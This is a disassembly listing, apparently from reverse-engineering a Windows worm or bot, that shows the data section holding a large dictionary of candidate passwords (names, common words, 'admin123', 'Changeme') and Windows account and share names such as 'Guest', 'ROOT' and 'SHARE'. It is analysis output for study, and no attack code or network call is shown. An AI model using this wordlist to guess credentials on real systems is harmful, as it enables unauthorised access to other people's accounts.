aDb1234 db 'db1234',0 ; DATA XREF: .text:0042CB84�o
align 4
aDb1 db 'db1',0 ; DATA XREF: .text:0042CB80�o
aDawn db 'dawn',0 ; DATA XREF: .text:0042CB7C�o
align 10h
aDave db 'dave',0 ; DATA XREF: .text:0042CB78�o
align 4
aDatabasepasswo db 'databasepassword',0 ; DATA XREF: .text:0042CB74�o
align 4
aDatabasepass db 'databasepass',0 ; DATA XREF: .text:0042CB70�o
align 4
aData db 'data',0 ; DATA XREF: .text:0042CB68�o
align 4
aDarkaven db 'darkaven',0 ; DATA XREF: .text:0042CB64�o
align 10h
aDark db 'dark',0 ; DATA XREF: .text:0042CB60�o
align 4
aDapper db 'dapper',0 ; DATA XREF: .text:0042CB5C�o
align 10h
aDanny db 'danny',0 ; DATA XREF: .text:0042CB58�o
align 4
aDanielle db 'danielle',0 ; DATA XREF: .text:0042CB54�o
align 4
aDaniel db 'daniel',0 ; DATA XREF: .text:0042CB50�o
align 4
aDancer db 'dancer',0 ; DATA XREF: .text:0042CB4C�o
align 4
aDana db 'dana',0 ; DATA XREF: .text:0042CB48�o
align 4
aDaisy db 'daisy',0 ; DATA XREF: .text:0042CB44�o
align 4
aDaemon db 'daemon',0 ; DATA XREF: .text:0042CB40�o
align 4
aD00d db 'd00d',0 ; DATA XREF: .text:0042CB3C�o
align 4
aCynthia db 'cynthia',0 ; DATA XREF: .text:0042CB38�o
aCyberspa db 'cyberspa',0 ; DATA XREF: .text:0042CB34�o
align 4
aCyberpun db 'cyberpun',0 ; DATA XREF: .text:0042CB30�o
align 4
aCyber db 'cyber',0 ; DATA XREF: .text:0042CB2C�o
align 4
aCustomer db 'customer',0 ; DATA XREF: .text:0042CB28�o
align 4
aCunt db 'cunt',0 ; DATA XREF: .text:0042CB24�o
align 10h
aCtx db 'ctx',0 ; DATA XREF: .text:0042CB20�o
aCshrc db 'cshrc',0 ; DATA XREF: .text:0042CB1C�o
align 4
aCrystal db 'crystal',0 ; DATA XREF: .text:0042CB18�o
aCristina db 'cristina',0 ; DATA XREF: .text:0042CB14�o
align 10h
aCriminal db 'criminal',0 ; DATA XREF: .text:0042CB10�o
align 4
aCrime db 'crime',0 ; DATA XREF: .text:0042CB0C�o
align 4
aCretin db 'cretin',0 ; DATA XREF: .text:0042CB08�o
align 4
aCreosote db 'creosote',0 ; DATA XREF: .text:0042CB04�o
align 4
aCredit db 'credit',0 ; DATA XREF: .text:0042CB00�o
align 10h
aCreature db 'creature',0 ; DATA XREF: .text:0042CAFC�o
align 4
aCreation db 'creation',0 ; DATA XREF: .text:0042CAF8�o
align 4
aCreate db 'create',0 ; DATA XREF: .text:0042CAF4�o
align 10h
aCream db 'cream',0 ; DATA XREF: .text:0042CAF0�o
align 4
aCrash db 'crash',0 ; DATA XREF: .text:0042CAEC�o
align 10h
aCrackpot db 'crackpot',0 ; DATA XREF: .text:0042CAE8�o
align 4
aCrack db 'crack',0 ; DATA XREF: .text:0042CAE4�o
align 4
aCowboy db 'cowboy',0 ; DATA XREF: .text:0042CAE0�o
align 4
aCouscous db 'couscous',0 ; DATA XREF: .text:0042CADC�o
align 4
aCountry db 'country',0 ; DATA XREF: .text:0042CAD8�o
aCounters db 'counters',0 ; DATA XREF: .text:0042CAD4�o
align 4
aCorrect db 'correct',0 ; DATA XREF: .text:0042CAD0�o
aCornelius db 'cornelius',0 ; DATA XREF: .text:0042CACC�o
align 10h
aCorneliu db 'corneliu',0 ; DATA XREF: .text:0042CAC8�o
align 4
aCopy db 'copy',0 ; DATA XREF: .text:0042CAC4�o
align 4
aCops db 'cops',0 ; DATA XREF: .text:0042CAC0�o
align 4
aCopper db 'copper',0 ; DATA XREF: .text:0042CABC�o
align 4
aCooper db 'cooper',0 ; DATA XREF: .text:0042CAB8�o
align 4
aCool db 'cool',0 ; DATA XREF: .text:0042CAB4�o
align 4
aCookie db 'cookie',0 ; DATA XREF: .text:0042CAB0�o
align 4
aCookbook db 'cookbook',0 ; DATA XREF: .text:0042CAAC�o
align 4
aCook db 'cook',0 ; DATA XREF: .text:0042CAA8�o
align 10h
aControl db 'control',0 ; DATA XREF: .text:0042CAA4�o
aContinue db 'continue',0 ; DATA XREF: sub_40CD3A+1EE6�o
; .text:0042CAA0�o
align 4
aConsole db 'console',0 ; DATA XREF: .text:0042CA9C�o
aConserva db 'conserva',0 ; DATA XREF: .text:0042CA98�o
align 4
aConnie db 'connie',0 ; DATA XREF: .text:0042CA94�o
align 10h
aCondom db 'condom',0 ; DATA XREF: .text:0042CA8C�o
align 4
aCondo db 'condo',0 ; DATA XREF: .text:0042CA88�o
align 10h
aComrades db 'comrades',0 ; DATA XREF: .text:0042CA84�o
align 4
aComrade db 'comrade',0 ; DATA XREF: .text:0042CA80�o
aComputin db 'computin',0 ; DATA XREF: .text:0042CA7C�o
align 10h
aCompaq db 'compaq',0 ; DATA XREF: .text:0042CA74�o
align 4
aCompany db 'company',0 ; DATA XREF: .text:0042CA70�o
aCommrades db 'commrades',0 ; DATA XREF: .text:0042CA6C�o
align 4
aCommrade db 'commrade',0 ; DATA XREF: .text:0042CA68�o
align 4
aCommit db 'commit',0 ; DATA XREF: .text:0042CA64�o
align 10h
aComics db 'comics',0 ; DATA XREF: .text:0042CA60�o
align 4
aCombat db 'combat',0 ; DATA XREF: .text:0042CA5C�o
align 10h
aColor db 'color',0 ; DATA XREF: .text:0042CA58�o
align 4
aCollins db 'collins',0 ; DATA XREF: .text:0042CA54�o
aCold db 'cold',0 ; DATA XREF: .text:0042CA50�o
align 4
aCola db 'cola',0 ; DATA XREF: .text:0042CA4C�o
align 10h
aCoke db 'coke',0 ; DATA XREF: .text:0042CA48�o
align 4
aCoin db 'coin',0 ; DATA XREF: .text:0042CA44�o
align 10h
aCoffee db 'coffee',0 ; DATA XREF: .text:0042CA40�o
align 4
aCodeword db 'codeword',0 ; DATA XREF: .text:0042CA3C�o
align 4
aCodename db 'codename',0 ; DATA XREF: .text:0042CA38�o
align 10h
aCode db 'code',0 ; DATA XREF: .text:0042CA34�o
align 4
aCock db 'cock',0 ; DATA XREF: .text:0042CA30�o
align 10h
aCocainco db 'cocainco',0 ; DATA XREF: .text:0042CA2C�o
align 4
aCocacola db 'cocacola',0 ; DATA XREF: .text:0042CA28�o
align 4
aCoast db 'coast',0 ; DATA XREF: .text:0042CA24�o
align 10h
aClusters db 'clusters',0 ; DATA XREF: .text:0042CA20�o
align 4
aCluster db 'cluster',0 ; DATA XREF: .text:0042CA1C�o
aClinton db 'clinton',0 ; DATA XREF: .text:0042CA18�o
aCleavage db 'cleavage',0 ; DATA XREF: .text:0042CA14�o
align 4
aClaymore db 'claymore',0 ; DATA XREF: .text:0042CA10�o
align 4
aClaudia db 'claudia',0 ; DATA XREF: .text:0042CA0C�o
aClassic db 'classic',0 ; DATA XREF: .text:0042CA08�o
aClasses db 'classes',0 ; DATA XREF: .text:0042CA04�o
aClass db 'class',0 ; DATA XREF: .text:0042CA00�o
align 4
aCisco db 'cisco',0 ; DATA XREF: .text:0042C9FC�o
align 4
aCindy db 'cindy',0 ; DATA XREF: .text:0042C9F8�o
align 4
aCigarett db 'cigarett',0 ; DATA XREF: .text:0042C9F4�o
align 10h
aCigar db 'cigar',0 ; DATA XREF: .text:0042C9F0�o
align 4
aChristy db 'christy',0 ; DATA XREF: .text:0042C9EC�o
aChristine db 'christine',0 ; DATA XREF: .text:0042C9E8�o
align 4
aChristina db 'christina',0 ; DATA XREF: .text:0042C9E4�o
align 4
aChristin db 'christin',0 ; DATA XREF: .text:0042C9E0�o
align 4
aChris db 'chris',0 ; DATA XREF: .text:0042C9DC�o
align 4
aChip db 'chip',0 ; DATA XREF: .text:0042C9D8�o
align 4
aChester db 'chester',0 ; DATA XREF: .text:0042C9D4�o
aChess db 'chess',0 ; DATA XREF: .text:0042C9D0�o
align 4
aChemistry db 'chemistry',0 ; DATA XREF: .text:0042C9CC�o
align 10h
aChemistr db 'chemistr',0 ; DATA XREF: .text:0042C9C8�o
align 4
aChem db 'chem',0 ; DATA XREF: .text:0042C9C4�o
align 4
aChat_0 db 'chat',0 ; DATA XREF: .text:0042C9C0�o
align 4
aCharon db 'charon',0 ; DATA XREF: .text:0042C9BC�o
align 4
aCharming db 'charming',0 ; DATA XREF: .text:0042C9B8�o
align 10h
aCharlie db 'charlie',0 ; DATA XREF: .text:0042C9B4�o
aCharles db 'charles',0 ; DATA XREF: .text:0042C9B0�o
aCharity db 'charity',0 ; DATA XREF: .text:0042C9AC�o
aChange db 'change',0 ; DATA XREF: .text:0042C9A8�o
align 10h
aCerulean db 'cerulean',0 ; DATA XREF: .text:0042C9A4�o
align 4
aCeltics db 'celtics',0 ; DATA XREF: .text:0042C9A0�o
aCeltic db 'celtic',0 ; DATA XREF: .text:0042C99C�o
align 4
aCelt db 'celt',0 ; DATA XREF: .text:0042C998�o
align 4
aCecily db 'cecily',0 ; DATA XREF: .text:0042C994�o
align 4
aCayuga db 'cayuga',0 ; DATA XREF: .text:0042C990�o
align 4
aCave db 'cave',0 ; DATA XREF: .text:0042C98C�o
align 4
aCathy db 'cathy',0 ; DATA XREF: .text:0042C988�o
align 4
aCatholic db 'catholic',0 ; DATA XREF: .text:0042C984�o
align 10h
aCatherine db 'catherine',0 ; DATA XREF: .text:0042C980�o
align 4
aCatherin db 'catherin',0 ; DATA XREF: .text:0042C97C�o
align 4
aCat db 'cat',0 ; DATA XREF: .text:0042C978�o
aCastle db 'castle',0 ; DATA XREF: .text:0042C974�o
align 4
aCash db 'cash',0 ; DATA XREF: .text:0042C970�o
align 4
aCascades db 'cascades',0 ; DATA XREF: .text:0042C96C�o
align 4
aCarson db 'carson',0 ; DATA XREF: .text:0042C968�o
align 10h
aCarrie db 'carrie',0 ; DATA XREF: .text:0042C964�o
align 4
aCaroline db 'caroline',0 ; DATA XREF: .text:0042C960�o
align 4
aCarolina db 'carolina',0 ; DATA XREF: .text:0042C95C�o
align 10h
aCarole db 'carole',0 ; DATA XREF: .text:0042C958�o
align 4
aCarol db 'carol',0 ; DATA XREF: .text:0042C954�o
align 10h
aCarmen db 'carmen',0 ; DATA XREF: .text:0042C950�o
align 4
aCarla db 'carla',0 ; DATA XREF: .text:0042C94C�o
align 10h
aCaren db 'caren',0 ; DATA XREF: .text:0042C948�o
align 4
aCardinal db 'cardinal',0 ; DATA XREF: .text:0042C944�o
align 4
aCard db 'card',0 ; DATA XREF: .text:0042C940�o
align 4
aCapture db 'capture',0 ; DATA XREF: .text:0042C93C�o
aCaptain db 'captain',0 ; DATA XREF: .text:0042C938�o
aCapitol db 'capitol',0 ; DATA XREF: .text:0042C934�o
aCantor db 'cantor',0 ; DATA XREF: .text:0042C930�o
align 4
aCandy db 'candy',0 ; DATA XREF: .text:0042C92C�o
align 4
aCandi db 'candi',0 ; DATA XREF: .text:0042C928�o
align 4
aCamping db 'camping',0 ; DATA XREF: .text:0042C924�o
aCampanile db 'campanile',0 ; DATA XREF: .text:0042C920�o
align 10h
aCampanil db 'campanil',0 ; DATA XREF: .text:0042C91C�o
align 4
aCamille db 'camille',0 ; DATA XREF: .text:0042C918�o
aCaliforn db 'californ',0 ; DATA XREF: .text:0042C914�o
align 10h
aCad db 'cad',0 ; DATA XREF: .text:0042C910�o
aButthead db 'butthead',0 ; DATA XREF: .text:0042C90C�o
align 10h
aButt db 'butt',0 ; DATA XREF: .text:0042C908�o
align 4
aButch db 'butch',0 ; DATA XREF: .text:0042C904�o
align 10h
aBurn db 'burn',0 ; DATA XREF: .text:0042C900�o
align 4
aBurgess db 'burgess',0 ; DATA XREF: .text:0042C8FC�o
aBung db 'bung',0 ; DATA XREF: .text:0042C8F8�o
align 4
aBumbling db 'bumbling',0 ; DATA XREF: .text:0042C8F4�o
align 4
aBullshit db 'bullshit',0 ; DATA XREF: .text:0042C8F0�o
align 10h
aBulls db 'bulls',0 ; DATA XREF: .text:0042C8EC�o
align 4
aBsd db 'bsd',0 ; DATA XREF: .text:0042C8E8�o
aBrutefor db 'brutefor',0 ; DATA XREF: .text:0042C8E4�o
align 4
aBrute db 'brute',0 ; DATA XREF: .text:0042C8E0�o
align 10h
aBrunette db 'brunette',0 ; DATA XREF: .text:0042C8DC�o
align 4
aBruce db 'bruce',0 ; DATA XREF: .text:0042C8D8�o
align 4
aBrothel db 'brothel',0 ; DATA XREF: .text:0042C8D4�o
aBroadway db 'broadway',0 ; DATA XREF: .text:0042C8D0�o
align 4
aBridget db 'bridget',0 ; DATA XREF: .text:0042C8CC�o
aBrian db 'brian',0 ; DATA XREF: .text:0042C8C8�o
align 4
aBrenda db 'brenda',0 ; DATA XREF: .text:0042C8C4�o
align 10h
aBreast db 'breast',0 ; DATA XREF: .text:0042C8C0�o
align 4
aBreak db 'break',0 ; DATA XREF: .text:0042C8BC�o
align 10h
aBravo db 'bravo',0 ; DATA XREF: .text:0042C8B8�o
align 4
aBrandy db 'brandy',0 ; DATA XREF: .text:0042C8B4�o
align 10h
aBrandi db 'brandi',0 ; DATA XREF: .text:0042C8B0�o
align 4
aBradley db 'bradley',0 ; DATA XREF: .text:0042C8AC�o
aBoyscout db 'boyscout',0 ; DATA XREF: .text:0042C8A8�o
align 4
aBorn db 'born',0 ; DATA XREF: .text:0042C8A4�o
align 4
aBook db 'book',0 ; DATA XREF: .text:0042C8A0�o
align 4
aBoobs db 'boobs',0 ; DATA XREF: .text:0042C89C�o
align 4
aBoob db 'boob',0 ; DATA XREF: .text:0042C898�o
align 4
aBoner db 'boner',0 ; DATA XREF: .text:0042C894�o
align 4
aBomb db 'bomb',0 ; DATA XREF: .text:0042C890�o
align 4
aBob db 'bob',0 ; DATA XREF: .text:0042C88C�o
aBoard db 'board',0 ; DATA XREF: .text:0042C888�o
align 4
aBlues db 'blues',0 ; DATA XREF: .text:0042C884�o
align 10h
aBlue db 'blue',0 ; DATA XREF: .text:0042C880�o
align 4
aBlowjob db 'blowjob',0 ; DATA XREF: .text:0042C87C�o
aBlow db 'blow',0 ; DATA XREF: .text:0042C878�o
align 4
aBloodaxe db 'bloodaxe',0 ; DATA XREF: .text:0042C874�o
align 4
aBlood db 'blood',0 ; DATA XREF: .text:0042C870�o
align 4
aBlondie db 'blondie',0 ; DATA XREF: .text:0042C86C�o
aBlonde db 'blonde',0 ; DATA XREF: .text:0042C868�o
align 4
aBlank db 'blank',0 ; DATA XREF: .text:0042C864�o
align 4
aBlack db 'black',0 ; DATA XREF: .text:0042C860�o
align 4
aBla db 'bla',0 ; DATA XREF: .text:0042C85C�o
aBitnet db 'bitnet',0 ; DATA XREF: .text:0042C858�o
align 4
aBitmap db 'bitmap',0 ; DATA XREF: .text:0042C854�o
align 10h
aBitch db 'bitch',0 ; DATA XREF: .text:0042C850�o
align 4
aBishop db 'bishop',0 ; DATA XREF: .text:0042C84C�o
align 10h
aBird db 'bird',0 ; DATA XREF: .text:0042C848�o
align 4
aBios db 'bios',0 ; DATA XREF: .text:0042C844�o
align 10h
aBinary db 'binary',0 ; DATA XREF: .text:0042C840�o
align 4
aBilly db 'billy',0 ; DATA XREF: .text:0042C83C�o
align 10h
aBill db 'bill',0 ; DATA XREF: .text:0042C838�o
align 4
aBigfoot db 'bigfoot',0 ; DATA XREF: .text:0042C834�o
aBicameral db 'bicameral',0 ; DATA XREF: .text:0042C830�o
align 4
aBicamera db 'bicamera',0 ; DATA XREF: .text:0042C82C�o
align 4
aBible db 'bible',0 ; DATA XREF: .text:0042C828�o
align 10h
aBeverly db 'beverly',0 ; DATA XREF: .text:0042C824�o
aBetty db 'betty',0 ; DATA XREF: .text:0042C820�o
align 10h
aBetsie db 'betsie',0 ; DATA XREF: .text:0042C81C�o
align 4
aBeth db 'beth',0 ; DATA XREF: .text:0042C818�o
align 10h
aBeta db 'beta',0 ; DATA XREF: .text:0042C814�o
align 4
aBeryl db 'beryl',0 ; DATA XREF: .text:0042C810�o
align 10h
aBerliner db 'berliner',0 ; DATA XREF: .text:0042C80C�o
align 4
aBerlin db 'berlin',0 ; DATA XREF: .text:0042C808�o
align 4
aBerkeley db 'berkeley',0 ; DATA XREF: .text:0042C804�o
align 10h
aBeowulf db 'beowulf',0 ; DATA XREF: .text:0042C800�o
aBenz db 'benz',0 ; DATA XREF: .text:0042C7FC�o
align 10h
aBeloved db 'beloved',0 ; DATA XREF: .text:0042C7F8�o
aBell db 'bell',0 ; DATA XREF: .text:0042C7F4�o
align 10h
aBehead db 'behead',0 ; DATA XREF: .text:0042C7F0�o
align 4
aBegin db 'begin',0 ; DATA XREF: .text:0042C7EC�o
align 10h
aBeethoven db 'beethoven',0 ; DATA XREF: .text:0042C7E8�o
align 4
aBeethove db 'beethove',0 ; DATA XREF: .text:0042C7E4�o
align 4
aBecky db 'becky',0 ; DATA XREF: .text:0042C7E0�o
align 10h
aBeaver db 'beaver',0 ; DATA XREF: .text:0042C7DC�o
align 4
aBeauty db 'beauty',0 ; DATA XREF: .text:0042C7D8�o
align 10h
aBeater db 'beater',0 ; DATA XREF: .text:0042C7D4�o
align 4
aBeast db 'beast',0 ; DATA XREF: .text:0042C7D0�o
align 10h
aBear db 'bear',0 ; DATA XREF: .text:0042C7CC�o
align 4
aBeammeup db 'beammeup',0 ; DATA XREF: .text:0042C7C8�o
align 4
aBeach db 'beach',0 ; DATA XREF: .text:0042C7C4�o
align 4
aBatman db 'batman',0 ; DATA XREF: .text:0042C7C0�o
align 4
aBatch db 'batch',0 ; DATA XREF: .text:0042C7BC�o
align 4
aBassoon db 'bassoon',0 ; DATA XREF: .text:0042C7B8�o
aBass db 'bass',0 ; DATA XREF: .text:0042C7B4�o
align 4
aBasic db 'basic',0 ; DATA XREF: .text:0042C7B0�o
align 4
aBaseball db 'baseball',0 ; DATA XREF: .text:0042C7AC�o
align 10h
aBartman db 'bartman',0 ; DATA XREF: .text:0042C7A8�o
aBart db 'bart',0 ; DATA XREF: .text:0042C7A4�o
align 10h
aBaritone db 'baritone',0 ; DATA XREF: .text:0042C7A0�o
align 4
aBarf db 'barf',0 ; DATA XREF: .text:0042C79C�o
align 4
aBare db 'bare',0 ; DATA XREF: .text:0042C798�o
align 4
aBarber db 'barber',0 ; DATA XREF: .text:0042C794�o
align 4
aBarbara db 'barbara',0 ; DATA XREF: .text:0042C790�o
aBanks db 'banks',0 ; DATA XREF: .text:0042C78C�o
align 4
aBank db 'bank',0 ; DATA XREF: .text:0042C788�o
align 4
aBandit db 'bandit',0 ; DATA XREF: .text:0042C784�o
align 4
aBananas db 'bananas',0 ; DATA XREF: .text:0042C780�o
aBanana db 'banana',0 ; DATA XREF: .text:0042C77C�o
align 4
aBall db 'ball',0 ; DATA XREF: .text:0042C778�o
align 4
aBailey db 'bailey',0 ; DATA XREF: .text:0042C774�o
align 4
aBadass db 'badass',0 ; DATA XREF: .text:0042C770�o
align 4
aBackup db 'backup',0 ; DATA XREF: .text:0042C76C�o
align 4
aBackdoor db 'backdoor',0 ; DATA XREF: .text:0042C768�o
align 10h
aBacchus db 'bacchus',0 ; DATA XREF: .text:0042C764�o
aBaby db 'baby',0 ; DATA XREF: .text:0042C760�o
align 10h
aBabe db 'babe',0 ; DATA XREF: .text:0042C75C�o
align 4
aAzure db 'azure',0 ; DATA XREF: .text:0042C758�o
align 10h
aAztecs db 'aztecs',0 ; DATA XREF: .text:0042C754�o
align 4
aAuthoriz db 'authoriz',0 ; DATA XREF: .text:0042C750�o
align 4
aAttack db 'attack',0 ; DATA XREF: .text:0042C74C�o
align 4
aAtom db 'atom',0 ; DATA XREF: .text:0042C748�o
align 4
aAtmosphere db 'atmosphere',0 ; DATA XREF: .text:0042C744�o
align 10h
aAtmosphe db 'atmosphe',0 ; DATA XREF: .text:0042C740�o
align 4
aAthena db 'athena',0 ; DATA XREF: .text:0042C73C�o
align 4
aAsshole db 'asshole',0 ; DATA XREF: .text:0042C738�o
aAsm db 'asm',0 ; DATA XREF: .text:0042C734�o
aAsian db 'asian',0 ; DATA XREF: .text:0042C730�o
align 4
aAsdfgh db 'asdfgh',0 ; DATA XREF: .text:0042C72C�o
; .text:0042E700�o
align 10h
aAsdf db 'asdf',0 ; DATA XREF: .text:0042C728�o
; .text:0042E6F8�o
align 4
aAsd db 'asd',0 ; DATA XREF: .text:0042C724�o
; .text:0042E6F4�o
aArtist db 'artist',0 ; DATA XREF: .text:0042C720�o
align 4
aArthur db 'arthur',0 ; DATA XREF: .text:0042C71C�o
align 4
aArrow db 'arrow',0 ; DATA XREF: .text:0042C718�o
align 4
aArmy db 'army',0 ; DATA XREF: .text:0042C714�o
align 4
aArlene db 'arlene',0 ; DATA XREF: .text:0042C710�o
align 4
aAriadne db 'ariadne',0 ; DATA XREF: .text:0042C70C�o
aAria db 'aria',0 ; DATA XREF: .text:0042C708�o
align 4
aApril db 'april',0 ; DATA XREF: .text:0042C704�o
align 4
aApollo13 db 'apollo13',0 ; DATA XREF: .text:0042C700�o
align 4
aAnything db 'anything',0 ; DATA XREF: .text:0042C6FC�o
align 4
aAnvils db 'anvils',0 ; DATA XREF: .text:0042C6F8�o
align 4
aAnthropogenic db 'anthropogenic',0 ; DATA XREF: .text:0042C6F4�o
align 4
aAnthropo db 'anthropo',0 ; DATA XREF: .text:0042C6F0�o
align 4
aAnthrax db 'anthrax',0 ; DATA XREF: .text:0042C6EC�o
aAnswer db 'answer',0 ; DATA XREF: .text:0042C6E8�o
align 4
aAnonymou db 'anonymou',0 ; DATA XREF: .text:0042C6E4�o
align 4
aAnon db 'anon',0 ; DATA XREF: .text:0042C6E0�o
align 4
aAnnette db 'annette',0 ; DATA XREF: .text:0042C6DC�o
aAnne db 'anne',0 ; DATA XREF: .text:0042C6D8�o
align 4
aAnna db 'anna',0 ; DATA XREF: .text:0042C6D4�o
align 4
aAnn db 'ann',0 ; DATA XREF: .text:0042C6D0�o
aAnita db 'anita',0 ; DATA XREF: .text:0042C6CC�o
align 10h
aAnimals db 'animals',0 ; DATA XREF: .text:0042C6C8�o
aAnimal db 'animal',0 ; DATA XREF: .text:0042C6C4�o
align 10h
aAngie db 'angie',0 ; DATA XREF: .text:0042C6C0�o
align 4
aAngerine db 'angerine',0 ; DATA XREF: .text:0042C6BC�o
align 4
aAngela db 'angela',0 ; DATA XREF: .text:0042C6B8�o
align 4
aAnfo db 'anfo',0 ; DATA XREF: .text:0042C6B4�o
align 4
aAndy db 'andy',0 ; DATA XREF: .text:0042C6B0�o
align 4
aAndromache db 'andromache',0 ; DATA XREF: .text:0042C6AC�o
align 4
aAndromac db 'andromac',0 ; DATA XREF: .text:0042C6A8�o
align 4
aAndroid db 'android',0 ; DATA XREF: .text:0042C6A4�o
aAndrea db 'andrea',0 ; DATA XREF: .text:0042C6A0�o
align 4
aAnchor db 'anchor',0 ; DATA XREF: .text:0042C69C�o
align 4
aAnarchy db 'anarchy',0 ; DATA XREF: .text:0042C698�o
aAnarchis db 'anarchis',0 ; DATA XREF: .text:0042C694�o
align 10h
aAnalog db 'analog',0 ; DATA XREF: .text:0042C690�o
align 4
aAnal db 'anal',0 ; DATA XREF: .text:0042C68C�o
align 10h
aAmy db 'amy',0 ; DATA XREF: .text:0042C688�o
aAmorphous db 'amorphous',0 ; DATA XREF: .text:0042C684�o
align 10h
aAmorphou db 'amorphou',0 ; DATA XREF: .text:0042C680�o
align 4
aAmerica db 'america',0 ; DATA XREF: .text:0042C67C�o
aAmber db 'amber',0 ; DATA XREF: .text:0042C678�o
align 4
aAmanda db 'amanda',0 ; DATA XREF: .text:0042C674�o
align 4
aAmadeus db 'amadeus',0 ; DATA XREF: .text:0042C670�o
aAma db 'ama',0 ; DATA XREF: .text:0042C66C�o
aAlphabet db 'alphabet',0 ; DATA XREF: .text:0042C668�o
align 4
aAlpha db 'alpha',0 ; DATA XREF: .text:0042C664�o
align 4
aAllow db 'allow',0 ; DATA XREF: .text:0042C660�o
align 4
aAllison db 'allison',0 ; DATA XREF: .text:0042C65C�o
aAlison db 'alison',0 ; DATA XREF: .text:0042C658�o
align 4
aAlisa db 'alisa',0 ; DATA XREF: .text:0042C654�o
align 4
aAlicia db 'alicia',0 ; DATA XREF: .text:0042C650�o
align 4
aAlice db 'alice',0 ; DATA XREF: .text:0042C64C�o
align 4
aAliases db 'aliases',0 ; DATA XREF: .text:0042C648�o
aAlias db 'alias',0 ; DATA XREF: .text:0042C644�o
align 4
aAlgebra db 'algebra',0 ; DATA XREF: .text:0042C640�o
aAlf db 'alf',0 ; DATA XREF: .text:0042C63C�o
aAlexande db 'alexande',0 ; DATA XREF: .text:0042C638�o
align 4
aAlert db 'alert',0 ; DATA XREF: .text:0042C634�o
align 4
aAlbert db 'albert',0 ; DATA XREF: .text:0042C630�o
align 4
aAlbatross db 'albatross',0 ; DATA XREF: .text:0042C62C�o
align 4
aAlbatros db 'albatros',0 ; DATA XREF: .text:0042C628�o
align 4
aAlbany db 'albany',0 ; DATA XREF: .text:0042C624�o
align 4
aAlaska db 'alaska',0 ; DATA XREF: .text:0042C620�o
align 4
aAirplane db 'airplane',0 ; DATA XREF: .text:0042C61C�o
align 10h
aAids db 'aids',0 ; DATA XREF: .text:0042C618�o
align 4
aAfro db 'afro',0 ; DATA XREF: .text:0042C614�o
align 10h
aAerobics db 'aerobics',0 ; DATA XREF: .text:0042C610�o
align 4
aAdult db 'adult',0 ; DATA XREF: .text:0042C60C�o
align 4
aAdrianna db 'adrianna',0 ; DATA XREF: .text:0042C608�o
align 10h
aAdrian db 'adrian',0 ; DATA XREF: .text:0042C604�o
align 4
aAdmin123 db 'admin123',0 ; DATA XREF: .text:0042C600�o
align 4
aAdm db 'adm',0 ; DATA XREF: .text:0042C5FC�o
aAdam db 'adam',0 ; DATA XREF: .text:0042C5F8�o
align 10h
aAda db 'ada',0 ; DATA XREF: .text:0042C5F4�o
aAction db 'action',0 ; DATA XREF: .text:0042C5F0�o
align 4
aAccounts db 'accounts',0 ; DATA XREF: .text:0042C5EC�o
align 4
aAccounting db 'accounting',0 ; DATA XREF: .text:0042C5E8�o
align 4
aAccount db 'account',0 ; DATA XREF: .text:0042C5E4�o
aAccess db 'access',0 ; DATA XREF: .text:0042C5E0�o
align 4
aAcademic db 'academic',0 ; DATA XREF: .text:0042C5D8�o
align 10h
aAcademia db 'academia',0 ; DATA XREF: .text:0042C5D4�o
align 4
aAbcd db 'abcd',0 ; DATA XREF: .text:0042C5D0�o
align 4
aAbc123 db 'abc123',0 ; DATA XREF: .text:0042C5CC�o
align 4
aAbc db 'abc',0 ; DATA XREF: .text:0042C5C8�o
aAaa db 'aaa',0 ; DATA XREF: .text:0042C5C4�o
; .text:0042E620�o
aWindowsxp db 'WindowsXP',0 ; DATA XREF: .text:0042C5BC�o
align 10h
aWrite db 'WRITE',0 ; DATA XREF: .text:0042C5B8�o
align 4
aUser_1 db 'User',0 ; DATA XREF: sub_4134AF:loc_4135C1�o
; .text:0042C5B4�o
align 10h
aTest db 'Test',0 ; DATA XREF: .text:0042C5AC�o
align 4
aStandard db 'Standard',0 ; DATA XREF: .text:0042C5A8�o
align 4
aSystem_0 db 'SYSTEM',0 ; DATA XREF: .text:0042C5A4�o
; .text:0042E680�o ...
align 4
aShare_0 db 'SHARE',0 ; DATA XREF: .text:0042C5A0�o
align 4
aServer_1 db 'SERVER',0 ; DATA XREF: .text:0042C59C�o
; .text:0042EA30�o
align 4
aRoss db 'Ross',0 ; DATA XREF: .text:0042C598�o
align 4
aRoscopcoltrane db 'RoscoPColtrane',0 ; DATA XREF: .text:0042C594�o
align 4
aRoscop db 'RoscoP',0 ; DATA XREF: .text:0042C590�o
align 4
aRosco db 'Rosco',0 ; DATA XREF: .text:0042C58C�o
align 4
off_4333B4 dd offset word_435052 ; DATA XREF: .text:0042C588�o
aRoot_0 db 'ROOT',0 ; DATA XREF: .text:0042C584�o
align 10h
aRead db 'READ',0 ; DATA XREF: .text:0042C580�o
align 4
aRage db 'RAGE',0 ; DATA XREF: .text:0042C57C�o
align 10h
aPassword db 'Password',0 ; DATA XREF: .text:0042C578�o
; .text:0042E63C�o
align 4
aOwner_0 db 'Owner',0 ; DATA XREF: .text:0042C574�o
align 4
aOem db 'OEM',0 ; DATA XREF: .text:0042C570�o
aNilez db 'Nilez',0 ; DATA XREF: .text:0042C56C�o
align 10h
aNd db 'ND',0 ; DATA XREF: .text:0042C568�o
align 4
aMatthew db 'Matthew',0 ; DATA XREF: .text:0042C564�o
aMatt db 'Matt',0 ; DATA XREF: .text:0042C560�o
align 4
aMat db 'Mat',0 ; DATA XREF: .text:0042C55C�o
aMs db 'MS',0 ; DATA XREF: .text:0042C558�o
align 4
aMp db 'MP',0 ; DATA XREF: .text:0042C554�o
align 10h
aM_1 db 'M$',0 ; DATA XREF: .text:0042C550�o
align 4
aLogin db 'Login',0 ; DATA XREF: .text:0042C54C�o
align 4
aLocal db 'LOCAL',0 ; DATA XREF: .text:0042C548�o
align 4
aInviter db 'Inviter',0 ; DATA XREF: .text:0042C544�o
aGuest db 'Guest',0 ; DATA XREF: sub_4134AF:loc_4135C8�o
; .text:0042C540�o
align 4
aGast db 'Gast',0 ; DATA XREF: .text:0042C53C�o
align 4
aFull_0 db 'FULL',0 ; DATA XREF: .text:0042C538�o
align 4
aFiles db 'FILES',0 ; DATA XREF: .text:0042C534�o
align 4
aDell db 'Dell',0 ; DATA XREF: .text:0042C530�o
align 4
aDefault_0 db 'Default',0 ; DATA XREF: .text:0042C52C�o
aChangeme db 'Changeme',0 ; DATA XREF: .text:0042C528�o
align 4
aCht db 'CHT',0 ; DATA XREF: .text:0042C524�o
aCheck db 'CHECK',0 ; DATA XREF: .text:0042C520�o
align 4
aBoth db 'BOTH',0 ; DATA XREF: .text:0042C51C�o
align 4
aAlexander db 'Alexander',0 ; DATA XREF: .text:0042C518�o
align 4
